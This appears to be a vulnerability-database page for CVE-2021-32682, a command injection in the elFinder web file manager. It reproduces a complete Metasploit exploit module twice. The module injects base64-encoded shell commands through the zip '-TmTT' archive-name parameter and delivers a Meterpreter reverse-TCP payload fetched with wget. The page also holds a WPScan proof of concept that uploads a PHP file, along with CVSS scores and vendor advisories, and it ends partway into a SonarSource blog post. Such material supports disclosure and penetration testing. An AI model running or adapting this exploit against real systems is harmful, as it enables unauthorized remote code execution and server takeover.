elFinder Archive Command Injection

2021-09-15T00:00:00

Description

{"id": "PACKETSTORM:164173", "type": "packetstorm", "bulletinFamily": "exploit", "title": "elFinder Archive Command Injection", "description": "", "published": "2021-09-15T00:00:00", "modified": "2021-09-15T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://packetstormsecurity.com/files/164173/elFinder-Archive-Command-Injection.html", "reporter": "Shelby Pace", "references": [], "cvelist": ["CVE-2021-32682"], "immutableFields": [], "lastseen": "2021-09-15T15:29:15", "viewCount": 194, "enchantments": {"dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-1018"]}, {"type": "cve", "idList": ["CVE-2021-32682", "CVE-2022-0403"]}, {"type": "github", "idList": ["GHSA-WPH3-44RJ-92PR"]}, {"type": "osv", "idList": ["OSV:GHSA-WPH3-44RJ-92PR"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:30F8EDB723C29FCCD04238CA5385CB84"]}, {"type": "sonarsource", "idList": ["SONARSOURCE:82C920BF6FA095A2CE2867D1EBDCCC6E"]}, {"type": "wpexploit", "idList": ["WPEX-ID:997A7FBF-98C6-453E-AD84-75C1E91D5A1E"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:997A7FBF-98C6-453E-AD84-75C1E91D5A1E"]}, {"type": "zdt", "idList": ["1337DAY-ID-36761"]}]}, "score": {"value": 0.4, "vector": "NONE"}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-1018"]}, {"type": "cve", "idList": ["CVE-2021-32682"]}, {"type": "github", "idList": ["GHSA-WPH3-44RJ-92PR"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:30F8EDB723C29FCCD04238CA5385CB84"]}, {"type": "sonarsource", "idList": ["SONARSOURCE:82C920BF6FA095A2CE2867D1EBDCCC6E"]}, {"type": "zdt", "idList": ["1337DAY-ID-36761"]}]}, "exploitation": null, "vulnersScore": 0.4}, "sourceHref": "https://packetstormsecurity.com/files/download/164173/elfinder_archive_cmd_injection.rb.txt", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'elFinder Archive Command Injection', \n'Description' => %q{ \nelFinder versions below 2.1.59 are vulnerable to a command injection \nvulnerability via its archive functionality. \n \nWhen creating a new zip archive, the `name` parameter is sanitized \nwith the `escapeshellarg()` php function and then passed to the \n`zip` utility. Despite the sanitization, supplying the `-TmTT` \nargument as part of the `name` parameter is still permitted and \nenables the execution of arbitrary commands as the `www-data` user. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'Thomas Chauchefoin', # Discovery \n'Shelby Pace' # Metasploit module \n], \n'References' => [ \n[ 'CVE', '2021-32682' ], \n[ 'URL', 'https://blog.sonarsource.com/elfinder-case-study-of-web-file-manager-vulnerabilities' ] \n], \n'Platform' => [ 'linux' ], \n'Privileged' => false, \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'Targets' => [ \n[ \n'Automatic Target', \n{ \n'Platform' => 'linux', \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'CmdStagerFlavor' => [ 'wget' ], \n'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' } \n} \n] \n], \n'DisclosureDate' => '2021-06-13', \n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => [ CRASH_SAFE ], \n'Reliability' => [ REPEATABLE_SESSION ], \n'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ] \n} \n) \n) \n \nregister_options([ OptString.new('TARGETURI', [ true, 'The URI of elFinder', '/' ]) ]) \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => upload_uri \n) \n \nreturn CheckCode::Unknown('Failed to retrieve a response') unless res \nreturn CheckCode::Safe('Failed to detect elFinder') unless res.body.include?('[\"errUnknownCmd\"]') \n \nvprint_status('Attempting to check the changelog for elFinder version') \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'Changelog') \n) \n \nunless res \nreturn CheckCode::Detected('elFinder is running, but cannot detect version through the changelog') \nend \n \n# * elFinder (2.1.58) \nvers_str = res.body.match(/\\*\\s+elFinder\\s+\$(\\d+\\.\\d+\\.\\d+)\$/) \nif vers_str.nil? || vers_str.length <= 1 \nreturn CheckCode::Detected('elFinder is running, but couldn\\'t retrieve the version') \nend \n \nversion_found = Rex::Version.new(vers_str[1]) \nif version_found < Rex::Version.new('2.1.59') \nreturn CheckCode::Appears(\"elFinder running version #{vers_str[1]}\") \nend \n \nCheckCode::Safe(\"Detected elFinder version #{vers_str[1]}, which is not vulnerable\") \nend \n \ndef upload_uri \nnormalize_uri(target_uri.path, 'php', 'connector.minimal.php') \nend \n \ndef upload_successful?(response) \nunless response \nprint_bad('Did not receive a response from elFinder') \nreturn false \nend \n \nif response.code != 200 || response.body.include?('error') \nprint_bad(\"Request failed: #{response.body}\") \nreturn false \nend \n \nunless response.body.include?('added') \nprint_bad(\"Failed to add new file: #{response.body}\") \nreturn false \nend \njson = JSON.parse(response.body) \nif json['added'].empty? \nreturn false \nend \n \ntrue \nend \n \nalias archive_successful? upload_successful? \n \ndef upload_txt_file(file_name) \nfile_data = Rex::Text.rand_text_alpha(8..20) \n \ndata = Rex::MIME::Message.new \ndata.add_part('upload', nil, nil, 'form-data; name=\"cmd\"') \ndata.add_part('l1_Lw', nil, nil, 'form-data; name=\"target\"') \ndata.add_part(file_data, 'text/plain', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{file_name}\\\"\") \n \nprint_status(\"Uploading file #{file_name} to elFinder\") \nsend_request_cgi( \n'method' => 'POST', \n'uri' => upload_uri, \n'ctype' => \"multipart/form-data; boundary=#{data.bound}\", \n'data' => data.to_s \n) \nend \n \ndef create_archive(archive_name, *files_to_archive) \nfiles_to_archive = files_to_archive.map { |file_name| \"l1_#{Rex::Text.encode_base64(file_name)}\" } \n \nsend_request_cgi( \n'method' => 'GET', \n'uri' => upload_uri, \n'encode_params' => false, \n'vars_get' => \n{ \n'cmd' => 'archive', \n'name' => archive_name, \n'target' => 'l1_Lw', \n'type' => 'application/zip', \n'targets[]' => files_to_archive.join('&targets[]=') \n} \n) \nend \n \ndef setup_files_for_sploit \n@txt_file = \"#{Rex::Text.rand_text_alpha(5..10)}.txt\" \nres = upload_txt_file(@txt_file) \nfail_with(Failure::UnexpectedReply, 'Upload was not successful') unless upload_successful?(res) \nprint_good('Text file was successfully uploaded!') \n \n@archive_name = \"#{Rex::Text.rand_text_alpha(5..10)}.zip\" \nprint_status(\"Attempting to create archive #{@archive_name}\") \nres = create_archive(@archive_name, @txt_file) \nfail_with(Failure::UnexpectedReply, 'Archive was not created') unless archive_successful?(res) \nprint_good('Archive was successfully created!') \n \nregister_files_for_cleanup(@txt_file, @archive_name) \nend \n \n# zip -r9 -q '-TmTT=\"$(id>out.txt)foooo\".zip' './a.zip' './a.txt' - sonarsource blog post \ndef execute_command(cmd, _opts = {}) \ncmd = \"echo #{Rex::Text.encode_base64(cmd)} | base64 -d |sh\" \ncmd_arg = \"-TmTT=\\\"$(#{cmd})#{Rex::Text.rand_text_alpha(1..3)}\\\"\" \ncmd_arg = cmd_arg.gsub(' ', '${IFS}') \n \ncreate_archive(cmd_arg, @archive_name, @txt_file) \nend \n \ndef exploit \nsetup_files_for_sploit \nexecute_cmdstager(noconcat: true, linemax: 150) \nend \nend \n`\n", "_state": {"dependencies": 1659970229, "score": 1659915190}, "_internal": {"score_hash": "ce0a25c0590bf291ddad9b8d9602c26d"}}

{"checkpoint_advisories": [{"lastseen": "2022-02-16T19:29:57", "description": "A command injection vulnerability exists in ElFinder. The vulnerability is due to insufficient validation of the file name when creating an archive.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-30T00:00:00", "type": "checkpoint_advisories", "title": "ElFinder File Manager Command Injection (CVE-2021-32682)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32682"], "modified": "2021-12-30T00:00:00", "id": "CPAI-2021-1018", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "github": [{"lastseen": "2022-08-11T02:02:22", "description": "### Impact\n\nWe recently fixed several vulnerabilities affect elFinder 2.1.58. These vulnerabilities can allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even with the minimal configuration. \n\n### Patches\n\nThe issues were addressed in our last release, 2.1.59. \n\n### Workarounds\n\nIf you can't update to 2.1.59, make sure your connector is not exposed without authentication.\n\n### Reference\n\nFurther technical details will be disclosed on https://blog.sonarsource.com/tag/security after some time.\n\n### For more information\n\nIf you have any questions or comments about this advisory, you can contact:\n - The original reporters, by sending an email to vulnerability.research@sonarsource.com;\n - The maintainers, by opening an issue on this repository.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-16T17:04:29", "type": "github", "title": "elFinder before 2.1.59 contains multiple vulnerabilities leading to RCE", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32682"], "modified": "2022-08-11T00:02:01", "id": "GHSA-WPH3-44RJ-92PR", "href": "https://github.com/advisories/GHSA-wph3-44rj-92pr", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osv": [{"lastseen": "2022-08-11T00:31:12", "description": "### Impact\n\nWe recently fixed several vulnerabilities affect elFinder 2.1.58. These vulnerabilities can allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even with the minimal configuration. \n\n### Patches\n\nThe issues were addressed in our last release, 2.1.59. \n\n### Workarounds\n\nIf you can't update to 2.1.59, make sure your connector is not exposed without authentication.\n\n### Reference\n\nFurther technical details will be disclosed on https://blog.sonarsource.com/tag/security after some time.\n\n### For more information\n\nIf you have any questions or comments about this advisory, you can contact:\n - The original reporters, by sending an email to vulnerability.research@sonarsource.com;\n - The maintainers, by opening an issue on this repository.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-16T17:04:29", "type": "osv", "title": "elFinder before 2.1.59 contains multiple vulnerabilities leading to RCE", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32682"], "modified": "2022-08-11T00:02:01", "id": "OSV:GHSA-WPH3-44RJ-92PR", "href": "https://osv.dev/vulnerability/GHSA-wph3-44rj-92pr", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2021-12-27T01:18:40", "description": "elFinder versions below 2.1.59 are vulnerable to a command injection vulnerability via its archive functionality. When creating a new zip archive, the name parameter is sanitized with the escapeshellarg() php function and then passed to the zip utility. Despite the sanitization, supplying the -TmTT argument as part of the name parameter is still permitted and enables the execution of arbitrary commands as the www-data user.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-15T00:00:00", "type": "zdt", "title": "elFinder Archive Command Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32682"], "modified": "2021-09-15T00:00:00", "id": "1337DAY-ID-36761", "href": "https://0day.today/exploit/description/36761", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'elFinder Archive Command Injection',\n 'Description' => %q{\n elFinder versions below 2.1.59 are vulnerable to a command injection\n vulnerability via its archive functionality.\n\n When creating a new zip archive, the `name` parameter is sanitized\n with the `escapeshellarg()` php function and then passed to the\n `zip` utility. Despite the sanitization, supplying the `-TmTT`\n argument as part of the `name` parameter is still permitted and\n enables the execution of arbitrary commands as the `www-data` user.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Thomas Chauchefoin', # Discovery\n 'Shelby Pace' # Metasploit module\n ],\n 'References' => [\n [ 'CVE', '2021-32682' ],\n [ 'URL', 'https://blog.sonarsource.com/elfinder-case-study-of-web-file-manager-vulnerabilities' ]\n ],\n 'Platform' => [ 'linux' ],\n 'Privileged' => false,\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'Targets' => [\n [\n 'Automatic Target',\n {\n 'Platform' => 'linux',\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'CmdStagerFlavor' => [ 'wget' ],\n 'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' }\n }\n ]\n ],\n 'DisclosureDate' => '2021-06-13',\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [ CRASH_SAFE ],\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ]\n }\n )\n )\n\n register_options([ OptString.new('TARGETURI', [ true, 'The URI of elFinder', '/' ]) ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => upload_uri\n )\n\n return CheckCode::Unknown('Failed to retrieve a response') unless res\n return CheckCode::Safe('Failed to detect elFinder') unless res.body.include?('[\"errUnknownCmd\"]')\n\n vprint_status('Attempting to check the changelog for elFinder version')\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'Changelog')\n )\n\n unless res\n return CheckCode::Detected('elFinder is running, but cannot detect version through the changelog')\n end\n\n # * elFinder (2.1.58)\n vers_str = res.body.match(/\\*\\s+elFinder\\s+\$(\\d+\\.\\d+\\.\\d+)\$/)\n if vers_str.nil? || vers_str.length <= 1\n return CheckCode::Detected('elFinder is running, but couldn\\'t retrieve the version')\n end\n\n version_found = Rex::Version.new(vers_str[1])\n if version_found < Rex::Version.new('2.1.59')\n return CheckCode::Appears(\"elFinder running version #{vers_str[1]}\")\n end\n\n CheckCode::Safe(\"Detected elFinder version #{vers_str[1]}, which is not vulnerable\")\n end\n\n def upload_uri\n normalize_uri(target_uri.path, 'php', 'connector.minimal.php')\n end\n\n def upload_successful?(response)\n unless response\n print_bad('Did not receive a response from elFinder')\n return false\n end\n\n if response.code != 200 || response.body.include?('error')\n print_bad(\"Request failed: #{response.body}\")\n return false\n end\n\n unless response.body.include?('added')\n print_bad(\"Failed to add new file: #{response.body}\")\n return false\n end\n json = JSON.parse(response.body)\n if json['added'].empty?\n return false\n end\n\n true\n end\n\n alias archive_successful? upload_successful?\n\n def upload_txt_file(file_name)\n file_data = Rex::Text.rand_text_alpha(8..20)\n\n data = Rex::MIME::Message.new\n data.add_part('upload', nil, nil, 'form-data; name=\"cmd\"')\n data.add_part('l1_Lw', nil, nil, 'form-data; name=\"target\"')\n data.add_part(file_data, 'text/plain', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{file_name}\\\"\")\n\n print_status(\"Uploading file #{file_name} to elFinder\")\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => upload_uri,\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => data.to_s\n )\n end\n\n def create_archive(archive_name, *files_to_archive)\n files_to_archive = files_to_archive.map { |file_name| \"l1_#{Rex::Text.encode_base64(file_name)}\" }\n\n send_request_cgi(\n 'method' => 'GET',\n 'uri' => upload_uri,\n 'encode_params' => false,\n 'vars_get' =>\n {\n 'cmd' => 'archive',\n 'name' => archive_name,\n 'target' => 'l1_Lw',\n 'type' => 'application/zip',\n 'targets[]' => files_to_archive.join('&targets[]=')\n }\n )\n end\n\n def setup_files_for_sploit\n @txt_file = \"#{Rex::Text.rand_text_alpha(5..10)}.txt\"\n res = upload_txt_file(@txt_file)\n fail_with(Failure::UnexpectedReply, 'Upload was not successful') unless upload_successful?(res)\n print_good('Text file was successfully uploaded!')\n\n @archive_name = \"#{Rex::Text.rand_text_alpha(5..10)}.zip\"\n print_status(\"Attempting to create archive #{@archive_name}\")\n res = create_archive(@archive_name, @txt_file)\n fail_with(Failure::UnexpectedReply, 'Archive was not created') unless archive_successful?(res)\n print_good('Archive was successfully created!')\n\n register_files_for_cleanup(@txt_file, @archive_name)\n end\n\n # zip -r9 -q '-TmTT=\"$(id>out.txt)foooo\".zip' './a.zip' './a.txt' - sonarsource blog post\n def execute_command(cmd, _opts = {})\n cmd = \"echo #{Rex::Text.encode_base64(cmd)} | base64 -d |sh\"\n cmd_arg = \"-TmTT=\\\"$(#{cmd})#{Rex::Text.rand_text_alpha(1..3)}\\\"\"\n cmd_arg = cmd_arg.gsub(' ', '${IFS}')\n\n create_archive(cmd_arg, @archive_name, @txt_file)\n end\n\n def exploit\n setup_files_for_sploit\n execute_cmdstager(noconcat: true, linemax: 150)\n end\nend\n", "sourceHref": "https://0day.today/exploit/36761", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-08-02T18:48:54", "description": "elFinder is an open-source file manager for web, written in JavaScript using jQuery UI. Several vulnerabilities affect elFinder 2.1.58. These vulnerabilities can allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even with minimal configuration. The issues were patched in version 2.1.59. As a workaround, ensure the connector is not exposed without authentication.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-14T17:15:00", "type": "cve", "title": "CVE-2021-32682", "cwe": ["CWE-22", "CWE-78", "CWE-918"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32682"], "modified": "2022-08-02T16:15:00", "cpe": [], "id": "CVE-2021-32682", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-32682", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-04-11T18:47:34", "description": "The Library File Manager WordPress plugin before 5.2.3 is using an outdated version of the elFinder library, which is know to be affected by security issues (CVE-2021-32682), and does not have any authorisation as well as CSRF checks in its connector AJAX action, allowing any authenticated users, such as subscriber to call it. Furthermore, as the options passed to the elFinder library does not restrict any file type, users with a role as low as subscriber can Create/Upload/Delete Arbitrary files and folders.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-04-04T16:15:00", "type": "cve", "title": "CVE-2022-0403", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32682", "CVE-2022-0403"], "modified": "2022-04-11T16:16:00", "cpe": [], "id": "CVE-2022-0403", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-0403", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:P"}, "cpe23": []}], "wpvulndb": [{"lastseen": "2022-04-15T14:18:16", "description": "The plugin is using an outdated version of the elFinder library, which is know to be affected by security issues (CVE-2021-32682), and does not have any authorisation as well as CSRF checks in its connector AJAX action, allowing any authenticated users, such as subscriber to call it. Furthermore, as the options passed to the elFinder library does not restrict any file type, users with a role as low as subscriber can Create/Upload/Delete Arbitrary files and folders.\n\n### PoC\n\nCreate an empty file to /aa.txt: POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 53 Connection: close Cookie: [any authenticated user] action=connector&cmd;=mkfile&name;=aa.txt&target;=l1_Lw Upload a PHP file to /hello.php: POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------14077557643203747161684872583 Content-Length: 597 Connection: close Cookie: [any authenticated user] \\-----------------------------14077557643203747161684872583 Content-Disposition: form-data; name=\"cmd\" upload \\-----------------------------14077557643203747161684872583 Content-Disposition: form-data; name=\"target\" l1_Lw \\-----------------------------14077557643203747161684872583 Content-Disposition: form-data; name=\"action\" connector \\-----------------------------14077557643203747161684872583 Content-Disposition: form-data; name=\"upload[]\"; filename=\"hello.php\" Content-Type: text/plain \\-----------------------------14077557643203747161684872583-- \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-14T00:00:00", "type": "wpvulndb", "title": " Library File Manager < 5.2.3 - Subscriber+ Arbitrary File Creation/Upload/Deletion", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32682", "CVE-2022-0403"], "modified": "2022-04-11T07:40:39", "id": "WPVDB-ID:997A7FBF-98C6-453E-AD84-75C1E91D5A1E", "href": "https://wpscan.com/vulnerability/997a7fbf-98c6-453e-ad84-75c1e91d5a1e", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "sonarsource": [{"lastseen": "2021-08-17T18:51:25", "description": "![Web file manager compromise by an unauthenticated attacker](https://images.prismic.io/sonarsource/287ee4a6-069f-4503-a54e-a156cf80dcfc_elFinder+Blogpost+%402x.png?auto=compress,format)\n\nAn application\u2019s interaction with the file system is always highly security sensitive, since minor functional bugs can easily be the source of exploitable vulnerabilities. This observation is especially true in the case of web file managers, whose role is to replicate the features of a complete file system and expose it to the client\u2019s browser in a transparent way.\n\nelFinder is a popular web file manager often used in CMS and frameworks, such as WordPress plugins (wp-file-manager) or Symfony bundles, to allow easy operations on both local and remote files. In the past, elFinder has been part of active in-the-wild attacks targeting unsafe configuration or actual code vulnerabilities. Thus, elFinder is published with a safe default configuration to prevent any malicious use by attackers.\n\nAs part of our regular assessment of widely deployed open-source projects, we discovered multiple new code vulnerabilities in elFinder. In the following case study of common code vulnerabilities in web file managers, we describe five different vulnerability chains and demonstrate how they could be exploited to gain control of the underlying server and its data. We will also discuss some of the patches that were later implemented by the vendor to show how to prevent them in your own code.\n\n## Impact\n\nWe 